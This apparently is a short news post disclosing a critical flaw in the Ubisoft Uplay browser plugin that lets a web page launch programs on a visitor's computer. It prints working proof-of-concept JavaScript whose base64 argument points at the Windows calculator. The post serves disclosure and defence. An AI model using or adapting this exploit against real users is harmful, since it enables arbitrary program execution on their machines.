A critical vulnerability in Ubisoft Uplay web-browser plugin which gets installed by all current Ubisoft games (Assassin's Creed II, Assassin's Creed: Brotherhood, Assassin's Creed: Project Legacy, Assassin's Creed Revelations, Assassin's Creed III, Beowulf: The Game, Brothers In Arms: Furious 4, Call Of Juarez: The Cartel, Driver: San Francisco, Heroes Of Might And Magic VI, Just Dance 3, Prince Of Persia: The Forgotten Sands, Pure Football, R.U.S.E., Shaun White Skateboarding, Silent Hunter 5: Battle Of The Atlantic, The Settlers 7: Paths To A Kingdom, Tom Clancy's H.A.W.X. 2, Tom Clancy's Ghost Recon: Future Soldier and Tom Clancy's Splinter Cell: Conviction) is public now allowing a hacker to remotely launch and install programs on a user computer.
All a hacker needs to do is to make user-click on a link and use these simple lines of code to attack. If you have an Ubisoft game installed a proof-of-concept is available at - http://pastehtml.com/view/c6gxl1a79.html (launches calculator executable).
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Add new comment